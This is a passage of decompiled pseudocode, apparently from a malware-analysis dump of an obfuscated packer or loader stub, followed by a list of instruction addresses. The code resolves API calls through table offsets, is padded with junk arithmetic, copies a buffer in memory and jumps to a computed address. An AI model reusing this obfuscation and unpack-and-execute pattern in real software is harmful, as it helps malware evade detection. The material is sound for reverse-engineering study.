								_t922 = _t922;
								_t751 = _t1058;
							}
							_v48 = _v48 ^ _t1058;
							_v48 = _v48 ^ _t751;
							_t752 =  *((intOrPtr*)(_t836 + 0xa90128))(_t1058);
							if( *((intOrPtr*)(_t836 + 0x41d827)) == 0) {
								 *_t1088 =  *_t1088 & 0x00000000;
								 *_t1088 =  *_t1088 + _t752;
								_v56 =  *((intOrPtr*)(_t836 + 0x41c29a));
								_t1058 = _t1058;
								_t806 =  *((intOrPtr*)(_t836 + 0xa90134))(_t952);
								_v16 = _t922;
								 *((intOrPtr*)(_t836 + 0x41d827)) = _t806;
								_t922 = _v16;
								_t752 = _t752;
							}
							_push(_t836);
							 *_t1088 =  *_t1088 ^ _t836;
							 *_t1088 =  *_t1088 ^ _t752;
							_t753 = _t836 + 0x41d422;
							if( *(_t836 + 0x41cb04) == 0) {
								_v12 = 0;
								_v56 = _v56 + _t753;
								_t805 =  *((intOrPtr*)(_t836 + 0xa90110))(_v12);
								_v12 = _t952;
								 *(_t836 + 0x41cb04) = 0 ^ _t805;
								_t952 = _v12;
								_pop(_t753);
							}
							_push(_v20);
							_v56 = _t753;
							if( *(_t836 + 0x41d39d) == 0) {
								_t803 = _t836 + 0x41d9b0;
								 *_t1088 =  *_t1088 & 0x00000000;
								 *_t1088 =  *_t1088 | _t803;
								 *_t803 = 0x14;
								_t804 =  *((intOrPtr*)(_t836 + 0xa901c4))(_t1025);
								 *(_t836 + 0x41d39d) =  *(_t836 + 0x41d39d) & 0x00000000;
								 *(_t836 + 0x41d39d) =  *(_t836 + 0x41d39d) ^ (_t1058 & 0x00000000 | _t804);
								_t1058 = _t1058;
							}
							_t754 =  *((intOrPtr*)(_t836 + 0xa90128))();
							if( *(_t836 + 0x41c6c9) == 0) {
								_v16 = 0;
								 *_t1088 =  *_t1088 + _t754;
								_t802 =  *((intOrPtr*)(_t836 + 0xa901d0))(_v16);
								 *(_t836 + 0x41c6c9) =  *(_t836 + 0x41c6c9) & 0x00000000;
								 *(_t836 + 0x41c6c9) =  *(_t836 + 0x41c6c9) ^ (_t952 - _v64 | _t802);
								_t952 = _t952;
								_pop(_t754);
							}
							_pop(_t853);
							_t755 = _t754 + _t853;
							if( *((intOrPtr*)(_t836 + 0x41c18a)) == 0) {
								_v56 = _v56 & 0x00000000;
								_v56 = _v56 | _t755;
								 *_t1088 = _t1025;
								_t801 =  *((intOrPtr*)(_t836 + 0xa901cc))(_v12, _t922);
								_v16 = _t1025;
								 *((intOrPtr*)(_t836 + 0x41c18a)) = _t801;
								_t1025 = _v16;
								_pop(_t755);
							}
							 *_t231 =  *((intOrPtr*)(_t836 + 0x41c972));
							_push(_v12);
							_pop(_t854);
							if(_t854 > _t755) {
								if( *(_t836 + 0x41d35d) == 0) {
									_t800 =  *((intOrPtr*)(_t836 + 0xa9013c))();
									 *(_t836 + 0x41d35d) =  *(_t836 + 0x41d35d) & 0x00000000;
									 *(_t836 + 0x41d35d) =  *(_t836 + 0x41d35d) ^ (_t1025 - _v56 | _t800);
									_t1025 = _t1025;
								}
								_t792 = _t836 + 0x41c8c6;
								if( *(_t836 + 0x41ce90) == 0) {
									_v56 = _v56 & 0x00000000;
									_v56 = _v56 ^ _t792;
									_t799 =  *((intOrPtr*)(_t836 + 0xa90140))();
									_v20 = _t854;
									 *(_t836 + 0x41ce90) =  *(_t836 + 0x41ce90) & 0x00000000;
									 *(_t836 + 0x41ce90) =  *(_t836 + 0x41ce90) ^ _t854 & 0x00000000 ^ _t799;
									_t854 = _v20;
									_t792 = _t836;
								}
								_push(_v16);
								_v56 = _t792;
								_t793 = _t836 + 0x41d422;
								if( *(_t836 + 0x41d088) == 0) {
									 *_t1088 =  *_t1088 & 0x00000000;
									 *_t1088 =  *_t1088 | _t793;
									_v64 =  *((intOrPtr*)(_t836 + 0x41d966));
									_t1080 = _t1058;
									_t798 =  *((intOrPtr*)(_t836 + 0xa901b8))(_t854, _t854);
									_v72 = _t1080;
									 *(_t836 + 0x41d088) = 0 ^ _t798;
									_t1058 = 0;
									_t793 = 0;
								}
								_push(_t952);
								 *_t1088 =  *_t1088 & 0x00000000;
								 *_t1088 =  *_t1088 ^ _t793;
								if( *(_t836 + 0x41cbc6) == 0) {
									_t1042 = _v64;
									_v64 =  *((intOrPtr*)(_t836 + 0x41d02b));
									_t797 =  *((intOrPtr*)(_t836 + 0xa901c8))(_t1025);
									 *(_t836 + 0x41cbc6) =  *(_t836 + 0x41cbc6) & 0x00000000;
									 *(_t836 + 0x41cbc6) =  *(_t836 + 0x41cbc6) ^ (_t1042 & 0x00000000 | _t797);
									_t1025 = _t1042;
								}
								_t794 =  *((intOrPtr*)(_t836 + 0xa9012c))();
								_v12 = _t952;
								 *(_t836 + 0x41cae0) =  *(_t836 + 0x41cae0) & 0x00000000;
								 *(_t836 + 0x41cae0) =  *(_t836 + 0x41cae0) ^ _t952 ^ _v12 ^ _t794;
								_t952 = _v12;
								_v64 = _t836 + 0x41d509;
								_v68 = _v68 - _t1058;
								_v68 = _v68 ^ _t836 + 0x0041c372;
								_t755 =  *((intOrPtr*)(_t836 + 0xa90130))(_t1058, _v12);
								_v12 = _t922;
								 *(_t836 + 0x41c250) =  *(_t836 + 0x41c250) & 0x00000000;
								 *(_t836 + 0x41c250) =  *(_t836 + 0x41c250) | _t922 & 0x00000000 | _t755;
							}
							_pop(_t923);
							if( *(_t836 + 0x41d638) == 0) {
								 *_t1088 =  *_t1088 & 0x00000000;
								 *_t1088 =  *_t1088 ^ _t923;
								_t755 =  *((intOrPtr*)(_t836 + 0xa901c8))(_t1025);
								_v16 = _t952;
								 *(_t836 + 0x41d638) = 0 ^ _t755;
								_t952 = _v16;
								_t923 = _t1088;
							}
							_pop(_t855);
							_v20 = 0;
							_push(_v20);
							_v48 = _v48 + _t855;
							if( *(_t836 + 0x41c8e2) == 0) {
								 *_t1088 =  *_t1088 ^ _t1025;
								 *_t1088 =  *_t1088 + _t923;
								_v56 =  *((intOrPtr*)(_t836 + 0x41d23a));
								_t755 =  *((intOrPtr*)(_t836 + 0xa90138))(_t1025);
								_v12 = _t952;
								 *(_t836 + 0x41c8e2) = 0 ^ _t755;
								_t952 = _v12;
								_t923 = _t755;
							}
							if( *(_t836 + 0x41c932) == 0) {
								if( *(_t836 + 0x41d49f) == 0) {
									 *_t1088 =  *_t1088 & 0x00000000;
									 *_t1088 =  *_t1088 + _t923;
									_v56 =  *((intOrPtr*)(_t836 + 0x41c592));
									_t1025 = _t1025;
									_t755 =  *((intOrPtr*)(_t836 + 0xa901b8))(_t923, _t836);
									 *(_t836 + 0x41d49f) =  *(_t836 + 0x41d49f) & 0x00000000;
									 *(_t836 + 0x41d49f) =  *(_t836 + 0x41d49f) ^ _t1058 - _v64 ^ _t755;
									_t1058 = _t1058;
									_t923 = 0;
								}
								_push(_v16);
								 *_t1088 = _t923;
								if( *((intOrPtr*)(_t836 + 0x41ccf7)) == 0) {
									_v56 = _v56 + 0x2000;
									_v56 = _v56 - _t923;
									 *_t1088 = 0x8c;
									_t1058 = _v64;
									_v64 =  *((intOrPtr*)(_t836 + 0x41d3bb));
									_v68 =  *((intOrPtr*)(_t836 + 0x41c3c1));
									_t1038 = _t1025;
									_v72 =  *((intOrPtr*)(_t836 + 0x41d737));
									_t855 = _t855;
									_t1025 =  *_t1088;
									 *_t1088 =  *(_t836 + 0x41c8ae);
									_v80 =  *((intOrPtr*)(_t836 + 0x41c267));
									_push( *((intOrPtr*)(_t836 + 0xa901bc))(_t755, _t1025, _t1038, _t923, _t923, _t1058, _t1058, _t923));
									_pop( *_t317);
									_push(_v16);
									_pop( *_t319);
								}
								_t784 =  *((intOrPtr*)(_t836 + 0xa90140))();
								if( *(_t836 + 0x41d5f6) == 0) {
									_v20 = _v20 & 0x00000000;
									_v56 = _v56 + _t784;
									_t952 =  *_t1088;
									 *_t1088 =  *(_t836 + 0x41cc89);
									_t786 =  *((intOrPtr*)(_t836 + 0xa901cc))(_v20);
									_v12 = _t1025;
									 *(_t836 + 0x41d5f6) =  *(_t836 + 0x41d5f6) & 0x00000000;
									 *(_t836 + 0x41d5f6) =  *(_t836 + 0x41d5f6) ^ (_t1025 & 0x00000000 | _t786);
									_t1025 = _v12;
									_t784 = _t952;
								}
								_v20 = _t1025;
								 *(_t836 + 0x41c932) =  *(_t836 + 0x41c932) & 0x00000000;
								 *(_t836 + 0x41c932) =  *(_t836 + 0x41c932) | _t1025 & 0x00000000 | _t784;
								_t1025 = _v20;
								_pop(_t923);
								if( *(_t836 + 0x41d9fa) == 0) {
									 *_t1088 =  *_t1088 ^ _t836;
									 *_t1088 = _t923;
									_t785 =  *((intOrPtr*)(_t836 + 0xa901d0))();
									_v56 = _t1058;
									 *(_t836 + 0x41d9fa) = 0 ^ _t785;
									_t1058 = 0;
									_t923 = _t836;
								}
							}
							_v20 = _v20 & 0x00000000;
							 *_t1088 =  *_t1088 ^ _t923;
							_v56 = _v56 & 0x00000000;
							_v56 = _v56 ^ _t836 + 0x0041d419;
							 *_t1088 =  *_t1088 - _t836;
							 *_t1088 = _t836 + 0x41d5ae;
							_t758 =  *((intOrPtr*)(_t836 + 0xa90130))(_t836, _t1025, _v20);
							_v64 = _t855;
							 *(_t836 + 0x41d994) = _t758;
							_t858 = 0;
							if( *(_t836 + 0x41da1a) == 0) {
								if( *(_t836 + 0x41d63c) == 0) {
									_t783 =  *((intOrPtr*)(_t836 + 0xa90110))();
									_v12 = _t858;
									 *(_t836 + 0x41d63c) =  *(_t836 + 0x41d63c) & 0x00000000;
									 *(_t836 + 0x41d63c) =  *(_t836 + 0x41d63c) ^ _t858 & 0x00000000 ^ _t783;
									_t858 = _v12;
								}
								_t758 =  *((intOrPtr*)(_t836 + 0xa90140))();
								if( *(_t836 + 0x41d57b) == 0) {
									_v64 = _v64 & 0x00000000;
									_v64 = _v64 ^ _t758;
									_v68 = _v68 - _t923;
									_v68 = _v68 | _t858;
									_t782 =  *((intOrPtr*)(_t836 + 0xa901cc))(_t858);
									_v12 = _t952;
									 *(_t836 + 0x41d57b) =  *(_t836 + 0x41d57b) & 0x00000000;
									 *(_t836 + 0x41d57b) =  *(_t836 + 0x41d57b) | _t952 & 0x00000000 ^ _t782;
									_t952 = _v12;
									_t758 = _t923;
								}
								 *(_t836 + 0x41da1a) =  *(_t836 + 0x41da1a) & 0x00000000;
								 *(_t836 + 0x41da1a) =  *(_t836 + 0x41da1a) | _t923 & 0x00000000 ^ _t758;
								_t923 = _t923;
								if( *(_t836 + 0x41d91e) == 0) {
									_v64 =  *((intOrPtr*)(_t836 + 0x41d8db));
									_t923 = _t923;
									_t758 =  *((intOrPtr*)(_t836 + 0xa901cc))(_t758);
									_v68 = _t1025;
									 *(_t836 + 0x41d91e) = _t758;
									_t1025 = 0;
								}
							}
							_push(_t758);
							_v64 =  *(_t836 + 0x41d6f8);
							_t975 = _t952;
							if( *(_t836 + 0x41cac0) == 0) {
								if( *((intOrPtr*)(_t836 + 0x41ccfb)) == 0) {
									_push(_t1058);
									_v68 =  *((intOrPtr*)(_t836 + 0x41c1bf));
									_t923 = _t923;
									_push(_t858);
									_v72 = _v72 + 0x10f;
									_v72 = _v72 - _t858;
									_push(_t1088);
									 *_t1088 = 0xe7;
									_push(_t1058);
									_v80 = _v80 + 7;
									_v80 = _v80 - _t1058;
									_push(_t1058);
									_v84 =  *((intOrPtr*)(_t836 + 0x41d3a9));
									_push(_v84);
									 *_t1088 =  *(_t836 + 0x41d8eb);
									_push(_t1025);
									_push( *_t1088);
									_v92 =  *((intOrPtr*)(_t836 + 0x41c2c6));
									_pop(_t1058);
									_t781 =  *((intOrPtr*)(_t836 + 0xa901bc))();
									 *_t1088 = _t858;
									 *((intOrPtr*)(_t836 + 0x41ccfb)) = _t781;
									_t858 = 0;
								}
								_push(_t923);
								_t923 = _v68;
								_v68 =  *((intOrPtr*)(_t836 + 0x41d1b7));
								if( *(_t836 + 0x41cd0f) == 0) {
									_t780 =  *((intOrPtr*)(_t836 + 0xa9013c))();
									_v16 = _t975;
									 *(_t836 + 0x41cd0f) =  *(_t836 + 0x41cd0f) & 0x00000000;
									 *(_t836 + 0x41cd0f) =  *(_t836 + 0x41cd0f) ^ (_t975 & 0x00000000 | _t780);
									_t975 = _v16;
								}
								_t778 =  *((intOrPtr*)(_t836 + 0xa901c8))();
								if( *(_t836 + 0x41d48b) == 0) {
									_v12 = _v12 & 0x00000000;
									_v72 = _v72 | _t778;
									_t779 =  *((intOrPtr*)(_t836 + 0xa9013c))(_v12);
									 *_t1088 = _t923;
									 *(_t836 + 0x41d48b) = 0 ^ _t779;
									_t923 = 0;
									_pop(_t778);
								}
								_v12 = _t975;
								 *(_t836 + 0x41cac0) =  *(_t836 + 0x41cac0) & 0x00000000;
								 *(_t836 + 0x41cac0) =  *(_t836 + 0x41cac0) ^ (_t975 ^ _v12 | _t778);
								_t975 = _v12;
							}
							_push(_t1025);
							_t1011 = _v68;
							_v68 =  *((intOrPtr*)(_t836 + 0x41c9ef));
							if( *(_t836 + 0x41c503) == 0) {
								_t777 =  *((intOrPtr*)(_t836 + 0xa90140))();
								_v16 = _t975;
								 *(_t836 + 0x41c503) =  *(_t836 + 0x41c503) & 0x00000000;
								 *(_t836 + 0x41c503) =  *(_t836 + 0x41c503) ^ _t975 & 0x00000000 ^ _t777;
								_t975 = _v16;
							}
							_t759 =  *((intOrPtr*)(_t836 + 0xa901b8))();
							_push(_t1058);
							_v72 = _v72 ^ _t1058;
							_v72 = _t759;
							if( *(_t836 + 0x41d112) == 0) {
								_t776 =  *((intOrPtr*)(_t836 + 0xa9013c))();
								 *(_t836 + 0x41d112) =  *(_t836 + 0x41d112) & 0x00000000;
								 *(_t836 + 0x41d112) =  *(_t836 + 0x41d112) ^ (_t975 & 0x00000000 | _t776);
								_t975 = _t975;
							}
							_push(_v16);
							 *_t1088 = _t836 + 0x41c249;
							if( *(_t836 + 0x41c4f3) == 0) {
								_t775 =  *((intOrPtr*)(_t836 + 0xa9013c))();
								_v20 = _t1011;
								 *(_t836 + 0x41c4f3) =  *(_t836 + 0x41c4f3) & 0x00000000;
								 *(_t836 + 0x41c4f3) =  *(_t836 + 0x41c4f3) | _t1011 & 0x00000000 | _t775;
								_t1011 = _v20;
							}
							_t761 = _t836 + 0x41d58e;
							if( *(_t836 + 0x41d340) == 0) {
								_v16 = 0;
								_v80 = _v80 + _t761;
								_v84 =  *((intOrPtr*)(_t836 + 0x41c6a9));
								_t975 = _t975;
								_t774 =  *((intOrPtr*)(_t836 + 0xa901c0))(_v16);
								 *(_t836 + 0x41d340) =  *(_t836 + 0x41d340) & 0x00000000;
								 *(_t836 + 0x41d340) =  *(_t836 + 0x41d340) | _t1058 -  *_t1088 ^ _t774;
								_t1058 = _t1058;
								_t761 = _t923;
							}
							_push(_v20);
							_v80 = _t761;
							if( *(_t836 + 0x41d16f) == 0) {
								_v84 =  *((intOrPtr*)(_t836 + 0x41d684));
								_t773 =  *((intOrPtr*)(_t836 + 0xa901c8))(_t761, _t761);
								_v12 = _t858;
								 *(_t836 + 0x41d16f) =  *(_t836 + 0x41d16f) & 0x00000000;
								 *(_t836 + 0x41d16f) =  *(_t836 + 0x41d16f) | _t858 & 0x00000000 | _t773;
								_t858 = _v12;
							}
							_t762 =  *((intOrPtr*)(_t836 + 0xa90130))();
							if( *(_t836 + 0x41c390) == 0) {
								_v16 = 0;
								_v84 = _v84 ^ _t762;
								 *_t1088 = 2;
								_t770 =  *((intOrPtr*)(_t836 + 0xa901b8))(_t1011, _v16);
								_v12 = _t1011;
								 *(_t836 + 0x41c390) = 0 ^ _t770;
								_t1011 = _v12;
								_t762 = 0;
							}
							_v16 = _t858;
							 *(_t836 + 0x41c78a) =  *(_t836 + 0x41c78a) & 0x00000000;
							 *(_t836 + 0x41c78a) =  *(_t836 + 0x41c78a) | _t858 ^ _v16 ^ _t762;
							_t861 = _v16;
							_pop(_t763);
							_v16 = _t975;
							 *(_t836 + 0x41d7d5) =  *(_t836 + 0x41d7d5) & 0x00000000;
							 *(_t836 + 0x41d7d5) =  *(_t836 + 0x41d7d5) ^ _t975 - _v16 ^ _t763;
							_t952 = _v16;
							if( *((intOrPtr*)(_t836 + 0x41d1db)) == 0) {
								_t768 = _t836 + 0x41cae4;
								_v80 = _t768;
								 *_t768 = 0x14;
								_t769 =  *((intOrPtr*)(_t836 + 0xa901c4))(_v12);
								_v20 = _t861;
								 *((intOrPtr*)(_t836 + 0x41d1db)) = _t769;
							}
							_pop(_t913);
							_pop(_t847);
							if( *(_t836 + 0x41d7e1) == 0) {
								_v72 = _t847;
								_v16 = _v16 & 0x00000000;
								 *_t1088 =  *_t1088 + _t913;
								_t767 =  *((intOrPtr*)(_t836 + 0xa9013c))(_v16, _v12);
								 *(_t836 + 0x41d7e1) =  *(_t836 + 0x41d7e1) & 0x00000000;
								 *(_t836 + 0x41d7e1) =  *(_t836 + 0x41d7e1) | _t952 & 0x00000000 | _t767;
								_t952 = _t952;
								_pop(_t913);
								_pop(_t847);
							}
							_pop(_t764);
							if( *((intOrPtr*)(_t836 + 0x41c3f9)) == 0) {
								_v16 = _v16 & 0x00000000;
								_v68 = _v68 ^ _t764;
								_v72 = _v72 & 0x00000000;
								_v72 = _v72 + _t847;
								 *_t1088 =  *_t1088 - _t952;
								 *_t1088 = _t913;
								_v80 =  *((intOrPtr*)(_t836 + 0x41d294));
								_push( *((intOrPtr*)(_t836 + 0xa901cc))(_t764, _v16));
								_pop( *_t510);
								_push(_v12);
								_pop( *_t512);
								_t913 = _t847;
								_t847 = _t952;
							}
						}
						asm("pushad");
						 *_t514 =  *(_t836 + 0x41d5c2);
						_push(_v20);
						_pop(_t724);
						if( *(_t836 + 0x41d5be) == 0) {
							_v12 = 0;
							_v28 = _v28 ^ _t724;
							_v32 =  *((intOrPtr*)(_t836 + 0x41caf8));
							_t746 =  *((intOrPtr*)(_t836 + 0xa901c0))(_v12);
							 *_t1088 = _t913;
							 *(_t836 + 0x41d5be) = 0 ^ _t746;
							_t913 = 0;
							_t724 = _t724;
						}
						_v12 = 0;
						_push(_v12);
						_v28 = _v28 + _t724;
						_t725 = _t836 + 0x41c6a6;
						if( *(_t836 + 0x41d73f) == 0) {
							_v32 = _v32 & 0x00000000;
							_v32 = _v32 ^ _t725;
							 *_t1088 = 1;
							_t743 =  *((intOrPtr*)(_t836 + 0xa901c0))(_t847);
							_v20 = _t913;
							 *(_t836 + 0x41d73f) =  *(_t836 + 0x41d73f) & 0x00000000;
							 *(_t836 + 0x41d73f) =  *(_t836 + 0x41d73f) ^ _t913 & 0x00000000 ^ _t743;
							_t913 = _v20;
							_t725 = _t1011;
						}
						_v32 = _v32 - _t952;
						_v32 = _v32 | _t725;
						_t726 =  *((intOrPtr*)(_t836 + 0xa90128))(_t952);
						_v16 = _v16 & 0x00000000;
						 *_t1088 =  *_t1088 | _t726;
						_v40 = _v40 & 0x00000000;
						_v40 = _v40 + _t836 + 0x41cd37;
						_t728 =  *((intOrPtr*)(_t836 + 0xa90128))(_v16);
						_t848 = _t952;
						_t729 = _t728 + _t848;
						_v12 = _t729;
						_t837 = _t848 & 0x00000000 ^ (_t729 ^ _v12 |  *(_t836 + 0x41d09c));
						if(_t837 > _v12) {
							_v12 = 0;
							_v40 = _v40 | _t836 + 0x0041c6a6;
							_v44 = _v44 ^ _t836;
							_v44 = _v44 + _t836 + 0x41cd37;
							_t742 =  *((intOrPtr*)(_t836 + 0xa9012c))(_t836, _v12);
							 *(_t836 + 0x41c32a) =  *(_t836 + 0x41c32a) & 0x00000000;
							 *(_t836 + 0x41c32a) =  *(_t836 + 0x41c32a) | _t837 - _v48 ^ _t742;
							_t837 = _t837;
						}
						_pop(_t733);
						 *_t1088 = 0x40;
						_v40 = _v40 + 0x1000;
						_v40 = _v40 - _t1058;
						_v20 = 0;
						_v44 = _v44 ^ _t733;
						_v20 = _v20 & 0x00000000;
						_v48 = _v48 | _t836 + 0x0041d275;
						 *_t1088 = _t836 + 0x41c56f;
						_t736 =  *((intOrPtr*)(_t836 + 0xa90130))(_v12, _v20, _v20, _t1058, _t836);
						_v16 = _t913;
						 *((intOrPtr*)(_t836 + 0x41d975)) = _t736;
						_t896 = _v16;
						_pop(_t737);
						_v12 = 0;
						_push(_v12);
						 *_t1088 =  *_t1088 ^ _t737;
						if( *((intOrPtr*)(_t836 + 0x41c2aa)) == 0) {
							_v56 =  *(_t836 + 0x41d2a8);
							_t952 = _t952;
							_t739 =  *((intOrPtr*)(_t836 + 0xa90134))(_t1058);
							 *_t1088 = _t896;
							 *((intOrPtr*)(_t836 + 0x41c2aa)) = _t739;
							_t896 = 0;
						}
						_push(0);
						if( *(_t836 + 0x41d284) == 0) {
							_t738 =  *((intOrPtr*)(_t836 + 0xa90138))(_t1058);
							_v16 = _t952;
							 *(_t836 + 0x41d284) =  *(_t836 + 0x41d284) & 0x00000000;
							 *(_t836 + 0x41d284) =  *(_t836 + 0x41d284) | _t952 & 0x00000000 ^ _t738;
							_t952 = _v16;
						}
						_t704 =  *((intOrPtr*)(_t836 + 0xa90124))();
					}
				}
				_t954 = _t952 & 0x00000000 | _t1058 - _v24 ^ _t704;
				_t1061 = _t1058;
				if( *(_t836 + 0x41d5ba) == 0) {
					_v24 =  *((intOrPtr*)(_t836 + 0x41d2e5));
					_t909 = _t896;
					_v28 =  *((intOrPtr*)(_t836 + 0x41d5a6));
					_t1019 = _t1011;
					_v32 =  *((intOrPtr*)(_t836 + 0x41cf1f));
					_t911 = _t909;
					_t1063 =  *_t1088;
					 *_t1088 =  *(_t836 + 0x41d3f2);
					_v40 =  *(_t836 + 0x41d2c1);
					_t896 = _t911;
					_t1011 = _v44;
					_v44 =  *(_t836 + 0x41d7a9);
					_v48 =  *(_t836 + 0x41d59e);
					_t1061 = _t1063;
					_t704 =  *((intOrPtr*)(_t836 + 0xa901bc))(_t1063, _t1019, _t837, _t1061, _t837, _t954, _t896);
					_v16 = _t954;
					 *(_t836 + 0x41d5ba) =  *(_t836 + 0x41d5ba) & 0x00000000;
					 *(_t836 + 0x41d5ba) =  *(_t836 + 0x41d5ba) ^ (_t954 - _v16 | _t704);
					_t954 = _v16;
				}
				_v20 = _t896;
				 *(_t836 + 0x41c286) =  *(_t836 + 0x41c286) & 0x00000000;
				 *(_t836 + 0x41c286) =  *(_t836 + 0x41c286) | _t896 - _v20 | _t954;
				_t899 = _v20;
				if( *(_t836 + 0x41d042) == 0) {
					_v24 =  *((intOrPtr*)(_t836 + 0x41d10a));
					_t719 =  *((intOrPtr*)(_t836 + 0xa901c0))(_t704, _t1011);
					_v12 = _t954;
					 *(_t836 + 0x41d042) =  *(_t836 + 0x41d042) & 0x00000000;
					 *(_t836 + 0x41d042) =  *(_t836 + 0x41d042) ^ _t954 & 0x00000000 ^ _t719;
					_t954 = _v12;
				}
				if(_t836 > 0) {
					if( *((intOrPtr*)(_t836 + 0x41d1af)) == 0) {
						 *_t623 =  *((intOrPtr*)(_t836 + 0xa90110))();
						_push(_v20);
						_pop( *_t625);
					}
					 *(_t836 + 0x41c507) =  *(_t836 + 0x41c507) + _t836;
					 *((intOrPtr*)(_t836 + 0x41c5cb)) =  *((intOrPtr*)(_t836 + 0x41c5cb)) + _t836;
					_v24 = _v24 & 0x00000000;
					_v24 = _v24 + _t836 + 0x41d77a;
					_v28 = _t836 + 0x41c27a;
					_t715 =  *((intOrPtr*)(_t836 + 0xa90130))(_v12, _t954);
					_v12 = _t1011;
					 *(_t836 + 0x41ca4d) =  *(_t836 + 0x41ca4d) & 0x00000000;
					 *(_t836 + 0x41ca4d) =  *(_t836 + 0x41ca4d) ^ _t1011 & 0x00000000 ^ _t715;
					_t1011 = _v12;
				}
				_t1013 = _t1011 & 0x00000000 | _t899 & 0x00000000 ^  *(_t836 + 0x41c507);
				_t902 = _t899;
				if( *(_t836 + 0x41d2c5) == 0) {
					_t712 =  *((intOrPtr*)(_t836 + 0xa9013c))();
					 *(_t836 + 0x41d2c5) =  *(_t836 + 0x41d2c5) & 0x00000000;
					 *(_t836 + 0x41d2c5) =  *(_t836 + 0x41d2c5) ^ _t837 & 0x00000000 ^ _t712;
					_t837 = _t837;
				}
				_v20 = _t954;
				_t839 = _t837 & 0x00000000 | _t954 & 0x00000000 ^  *(_t836 + 0x41d5c2);
				_t957 = _v20;
				asm("cld");
				if( *(_t836 + 0x41d667) == 0) {
					_v24 = _t839;
					_v28 = _v28 + 1;
					_v28 = _v28 - _t1061;
					_t711 =  *((intOrPtr*)(_t836 + 0xa901b8))(_t1061, _v20);
					 *(_t836 + 0x41d667) =  *(_t836 + 0x41d667) & 0x00000000;
					 *(_t836 + 0x41d667) =  *(_t836 + 0x41d667) ^ (_t902 & 0x00000000 | _t711);
					_t902 = _t902;
					_t839 = 0;
				}
				_t705 = memcpy(_t957, _t1013, _t839);
				_t1089 =  &(_t1088[3]);
				_t959 = _t1013 + _t839 + _t839;
				if( *(_t836 + 0x41cbf7) == 0) {
					_v24 = _t1089;
					_t705 =  *((intOrPtr*)(_t836 + 0xa90134))(_v12);
					_v16 = 0;
					 *(_t836 + 0x41cbf7) =  *(_t836 + 0x41cbf7) & 0x00000000;
					 *(_t836 + 0x41cbf7) =  *(_t836 + 0x41cbf7) ^ (0 | _t705);
				}
				_v24 = 0xfffff;
				_t841 = _t1013;
				_v12 = _t959;
				_t707 = _t705 & 0x00000000 | _t959 & 0x00000000 ^  *(_t836 + 0x41c286);
				_t962 = _v12;
				if( *((intOrPtr*)(_t836 + 0x41d21e)) == 0) {
					_v16 = _v16 & 0x00000000;
					_v24 = _v24 ^ _t707;
					_v28 = _v28 & 0x00000000;
					_v28 = _v28 | _t841;
					_t710 =  *((intOrPtr*)(_t836 + 0xa90110))(_v16);
					_v12 = _t962;
					 *((intOrPtr*)(_t836 + 0x41d21e)) = _t710;
					_t962 = _v12;
					_t841 = _t902;
					_pop(_t707);
				}
				_v24 = _v24 + 0x4092f1;
				_v24 = _v24 - _t962;
				 *_t677 = _t962;
				if( *((intOrPtr*)(_t836 + 0x41d4c5)) == 0) {
					_v12 = _v12 & 0x00000000;
					_v24 = _v24 | _t707;
					_v28 = _v28 ^ _t902;
					_v28 = _v28 + _t841;
					_v16 = 0;
					_v32 = _v32 ^ _t902;
					_t709 =  *((intOrPtr*)(_t836 + 0xa90134))(_v16, _v12);
					 *_t1089 = _t1013;
					 *((intOrPtr*)(_t836 + 0x41d4c5)) = _t709;
					_t1013 = 0;
					_pop(_t841);
					_t707 = _t902;
				}
				 *(_t836 + 0x41d375) =  *(_t836 + 0x41d375) & _t841;
				 *(_t836 + 0x41d375) =  *(_t836 + 0x41d375) + _t707;
				if( *(_t836 + 0x41d60b) == 0) {
					_v24 = _v24 + 6;
					_v24 = _v24 - _t841;
					_v28 =  *(_t836 + 0x41c93e);
					_t708 =  *((intOrPtr*)(_t836 + 0xa901b8))(_t962, _t1013, _t841);
					_v12 = _t902;
					 *(_t836 + 0x41d60b) =  *(_t836 + 0x41d60b) & 0x00000000;
					 *(_t836 + 0x41d60b) =  *(_t836 + 0x41d60b) ^ _t902 - _v12 ^ _t708;
				}
				goto ( *(_t836 + 0x41d375));
			}

0x02e9810d
0x02e9810f
0x02e98113
0x02e9811a
0x02e9811f
0x02e98128
0x02e9812f
0x02e98136
0x02e9813a
0x02e98141
0x02e98144
0x02e9814c
0x02e9814e
0x02e98150
0x02e98151
0x02e98157
0x02e9815e
0x02e98162
0x02e98165
0x02e98169
0x02e9816c
0x02e98175
0x02e9817c
0x02e9817f
0x02e98185
0x02e9818d
0x02e98194
0x02e9819a
0x02e9819d
0x02e9819e
0x02e9819f
0x02e981a7
0x02e98235
0x02e98236
0x02e98239
0x02e98243
0x02e98245
0x02e9824b
0x02e98252
0x02e98258
0x02e98258
0x02e98263
0x02e98268
0x02e98275
0x02e9827a
0x02e9827d
0x02e98285
0x02e9828c
0x02e98292
0x02e98293
0x02e98293
0x02e98294
0x02e9829c
0x02e982a3
0x02e982a9
0x02e982b3
0x02e982bd
0x02e982c1
0x02e982c2
0x02e982ca
0x02e982d1
0x02e982d7
0x02e982d7
0x02e982d8
0x02e982e0
0x02e982e2
0x02e982e9
0x02e982ef
0x02e982f8
0x02e982f9
0x02e982fc
0x02e982ff
0x02e98305
0x02e98305
0x02e98306
0x02e9830e
0x02e98313
0x02e98316
0x02e98320
0x02e98323
0x02e98329
0x02e98330
0x02e98339
0x02e9833a
0x02e9833a
0x02e9833b
0x02e9833f
0x02e98342
0x02e98349
0x02e9834d
0x02e98350
0x02e9835a
0x02e9835e
0x02e98367
0x02e9836e
0x02e98371
0x02e9837d
0x02e98384
0x02e9838b
0x02e9838c
0x02e9838d
0x02e9838d
0x02e98395
0x02e9839e
0x02e983a1
0x02e983ab
0x02e983ae
0x02e983b8
0x02e983c4
0x02e983cd
0x02e983d7
0x02e983da
0x02e983e2
0x02e983e9
0x02e983ef
0x02e983f0
0x02e983f1
0x02e983f2
0x02e983fa
0x02e98407
0x02e9840a
0x02e9840e
0x02e98411
0x02e9841b
0x02e9841f
0x02e98423
0x02e9842e
0x02e98432
0x02e98433
0x02e98439
0x02e98440
0x02e98449
0x02e9844a
0x02e9844b
0x02e9844b
0x02e9844c
0x02e9844d
0x02e98451
0x02e98454
0x02e98455
0x02e98458
0x02e98462
0x02e98465
0x02e98469
0x02e9846c
0x02e98478
0x02e9847f
0x02e98485
0x02e98486
0x02e98486
0x02e98487
0x02e9848e
0x02e98491
0x02e98497
0x02e984a1
0x02e984aa
0x02e984b1
0x02e984b4
0x02e984bb
0x02e984bf
0x02e984cb
0x02e984ce
0x02e984d4
0x02e984e4
0x02e984e6
0x02e984e9
0x02e984f4
0x02e984fd
0x02e98507
